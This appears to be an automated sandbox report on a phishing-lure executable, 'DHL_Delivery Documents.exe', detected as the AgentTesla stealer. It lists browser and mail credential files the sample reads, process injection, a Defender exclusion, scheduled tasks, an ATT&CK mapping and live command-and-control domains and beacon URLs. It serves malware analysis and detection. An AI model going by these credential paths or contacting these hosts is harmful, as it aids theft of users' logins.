            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Users\user\AppData\Roaming\YybGLWQSx.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match | File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\setx.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\setx.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

Source: Yara match | File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the count of matching signatures for that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Process Injection (312); Scheduled Task/Job (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (41); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (13); Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1446732; Sample: DHL_Delivery Documents.exe; Start date: 23/05/2024; Architecture: WINDOWS; Score: 100)

Contacted domains/IPs: www.uzonedich.com; www.prospin.click; 3 other IPs or domains
Signatures on the sample: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 11 other signatures

Process tree:
• DHL_Delivery Documents.exe (started)
    Dropped: C:\Users\user\AppData\Roaming\YybGLWQSx.exe (PE32); C:\Users\user\AppData\Local\...\tmp3106.tmp (XML)
    Signature: Adds a directory exclusion to Windows Defender
    • DHL_Delivery Documents.exe (started)
        Signature: Maps a DLL or memory area into another process
        • OoIHIwIlaOHZFTFWeSHYCjEJ.exe (injected)
            Signature: Found direct / indirect Syscall (likely to bypass EDR)
            • setx.exe (started)
                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                • OoIHIwIlaOHZFTFWeSHYCjEJ.exe (injected)
                    Signature: Found direct / indirect Syscall (likely to bypass EDR)
                    Network: www.uzonedich.com 103.48.135.8, ports 49710, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Hong Kong; www.alexbruma.com 172.67.214.17, ports 49711, 49712, 49713, CLOUDFLARENETUS, United States
                • firefox.exe (started)
    • powershell.exe (started)
        Signature: Loading BitLocker PowerShell Module
        • WmiPrvSE.exe (started)
        • conhost.exe (started)
    • powershell.exe (started)
        • conhost.exe (started)
    • schtasks.exe (started)
        • conhost.exe (started)
• YybGLWQSx.exe (started)
    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • schtasks.exe (started)
        • conhost.exe (started)
    • YybGLWQSx.exe (started)

Source | Detection | Scanner | Label
DHL_Delivery Documents.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
DHL_Delivery Documents.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\YybGLWQSx.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\YybGLWQSx.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://tempuri.org/DataSet1.xsd | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.uzonedich.com/ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI | 0% | Avira URL Cloud | safe
http://www.alexbruma.com/0eyj/ | 0% | Avira URL Cloud | safe
http://www.alexbruma.com/0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI | 0% | Avira URL Cloud | safe
http://www.alexbruma.com | 0% | Avira URL Cloud | safe
http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.uzonedich.com | 103.48.135.8 | true | true | | unknown
www.alexbruma.com | 172.67.214.17 | true | false | | unknown
www.prospin.click | unknown | unknown | true | | unknown
www.bookingshop01.top | unknown | unknown | true | | unknown
www.7egiy1.cfd | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.alexbruma.com/0eyj/ | false | Avira URL Cloud: safe | unknown
http://www.uzonedich.com/ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI | true | Avira URL Cloud: safe | unknown
http://www.alexbruma.com/0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources | DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/DataSet1.xsd | DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr | false | URL Reputation: safe | unknown
http://www.alexbruma.com | OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DHL_Delivery Documents.exe, 00000000.00000002.2080507854.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, YybGLWQSx.exe, 00000009.00000002.2305807020.00000000024D7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
